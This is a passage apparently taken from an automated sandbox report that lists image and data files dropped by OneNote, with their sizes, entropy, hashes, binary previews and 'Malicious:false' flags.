                                                                                                                                                                                                              SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3009
                                                                                                                                                                                                              Entropy (8bit):7.493528353751471
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                                                                                                                              MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                                                                                                                              SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                                                                                                                              SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                                                                                                                              SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12654
                                                                                                                                                                                                              Entropy (8bit):7.745439197485533
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                                                                                                                              MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                                                                                                                              SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                                                                                                                              SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                                                                                                                              SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39010
                                                                                                                                                                                                              Entropy (8bit):7.362726513389497
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                              MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                              SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                              SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                              SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2104
                                                                                                                                                                                                              Entropy (8bit):7.252780160030615
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                                                                                                                              MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                                                                                                                              SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                                                                                                                              SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                                                                                                                              SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):140755
                                                                                                                                                                                                              Entropy (8bit):7.9013245181576695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                                                                                                                              MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                                                                                                                              SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                                                                                                                              SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                                                                                                                              SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6366347823800623
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Ra0stYyf9/Ufg19FFBtq6HtwHB2Wf/0HBq:Y0stYyfSG/tqGdK
                                                                                                                                                                                                              MD5:03BE51C6595215142D7EF32D74E20C76
                                                                                                                                                                                                              SHA1:EF74BDFD774D1DB9E041A23090ACF86D3217AF9A
                                                                                                                                                                                                              SHA-256:7060ED447661542419AA49D76A356E8F4350062C2C74110627909D13632304DA
                                                                                                                                                                                                              SHA-512:B241051110E0DFD22AA7BF2B443B73AC911274DCA284FC7F2F71A2050B3E84A6A875A4319B461CDC556348442BCC7B8F922E0ED3863FE7C0D4854A3C37D616C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.Q.vHf.D.u(062S.................?.....I...............................................................................................................h............................................i8.$x.M..pH2..H...............M..Du..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25622
                                                                                                                                                                                                              Entropy (8bit):7.058784902089801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                              MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                              SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                              SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                              SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53259
                                                                                                                                                                                                              Entropy (8bit):7.651662052139301
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                              MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                              SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                              SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                              SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1873
                                                                                                                                                                                                              Entropy (8bit):7.534961703340853
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                                                                                                                              MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                                                                                                                              SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                                                                                                                              SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                                                                                                                              SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):129887
                                                                                                                                                                                                              Entropy (8bit):7.8877849553452695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                                                                                                                              MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                                                                                                                              SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                                                                                                                              SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                                                                                                                              SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):515
                                                                                                                                                                                                              Entropy (8bit):6.740133870626016
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                                                                                                                              MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                                                                                                                              SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                                                                                                                              SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                                                                                                                              SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6436389217470632
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaGlKYyf9/UfGBWzFFBtWhVQ3JV5Wf/ZJVx:YqKYyfSuUtWhVeV5mVx
                                                                                                                                                                                                              MD5:33BDEE09A4D461BFEE05FE6F8DC9DC7E
                                                                                                                                                                                                              SHA1:C22DF5B5AFE65FD8B00C2DC01E0234E787954733
                                                                                                                                                                                                              SHA-256:CFBFF857C0EFBF0C3EF647A2F598143C1643FC300776D56F63E1EE0AB5EF5380
                                                                                                                                                                                                              SHA-512:678DE0AD4B70D7C98DE2F07C9FF0F73C15246AAA5E968477C7D8F30D72DEC7FB049FF1DE3C0129BBD3228A702131FFA8A930DF4679033F1E662EC5989B11740F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_C..* l:E.X...-K.................?.....I...............................................................................................................h.............................................?6m.`G.. .o...........93q...oL.....#Z^............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19920
                                                                                                                                                                                                              Entropy (8bit):7.987696084459766
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                                                                                                                              MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                                                                                                                              SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                                                                                                                              SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                                                                                                                              SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5040
                                                                                                                                                                                                              Entropy (8bit):1.0427712572443908
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Ralt/FYyfHjQXnhUnSDKTFXFFBtoB/FUW6/iEVhBFaUsC1XOXIxAS:Y//FYyfHMXeSDKTFdtoB/e7jBMiUCAS
                                                                                                                                                                                                              MD5:D8FE3C983AE60FE2A11DD8238D9207F4
                                                                                                                                                                                                              SHA1:57574013AC4DC66A37AE6B83ED27ADC4D34FF6F8
                                                                                                                                                                                                              SHA-256:DE711226A1AA463C17B919B3D3F253CD7C782A9E04C0DF240B916F3EA121A8A8
                                                                                                                                                                                                              SHA-512:C8AF6382DD55BA71C122EB0D832ED5E5D9BB8541E0B41C93A1ABA5E6B49B2DF84D52FACA7C892CD054FF14F390EE12479EA742836648EFA69EFD9EC7326B918D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_C.4A#z`N.3.J..L.................?.....I.........................................................................$.bU.D.U.;D.C.A.......................h...........................................h..)...J..1f:.~................B.`...3..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                              Entropy (8bit):1.2344170928067832
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Racc/Yyfi8u/UXlFFBtFQ6Wn+J/WyAPzApUqVMqXIxASDk1+GllE0daNcasnIB:YD/YyfccHtVfgywz+mqCASc+Glm0dOse
                                                                                                                                                                                                              MD5:3C2BDCE611DD103478E1A99FEB6CB555
                                                                                                                                                                                                              SHA1:3B8ACB53FC704412862FBF5C5D7C4DF70E656B52
                                                                                                                                                                                                              SHA-256:2BDB45F90BB5B27F405DC41A9498D61471B05B6D9EE0E99FAFAD9C4B58D05A4E
                                                                                                                                                                                                              SHA-512:AB07F49C9643912E7C9A2E71073EE928893919A2294284B144485F3333811B2FFFFA41502736C59A49C9D851DB00EC2EBD5B5952FC14406A32309B8288063805
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_..$.bU.D.U.;D.C.................?.....I.......................................................................9.W.n1F.....Ex..!wY....................h............................................b....QM.hZ+.................K..9.K..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6496
                                                                                                                                                                                                              Entropy (8bit):1.5171795170228541
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:YBYyf7CVdlhot4JtcwOwf8nwwZwhE8CASutnSMekNfC+XkXA5Tg5C6C/ua:Wn7CV/tfflwOhomtNHDCM6w
                                                                                                                                                                                                              MD5:DADDF23C4FCD63F3FFC0C3C012D70C3A
                                                                                                                                                                                                              SHA1:454A2CA8541FD88CF0D637BF0A30B4A4B75CCF29
                                                                                                                                                                                                              SHA-256:1E494311F15BDB4D6C5CCBF1223344248228BBDAE0D9665126F7F34C41167D15
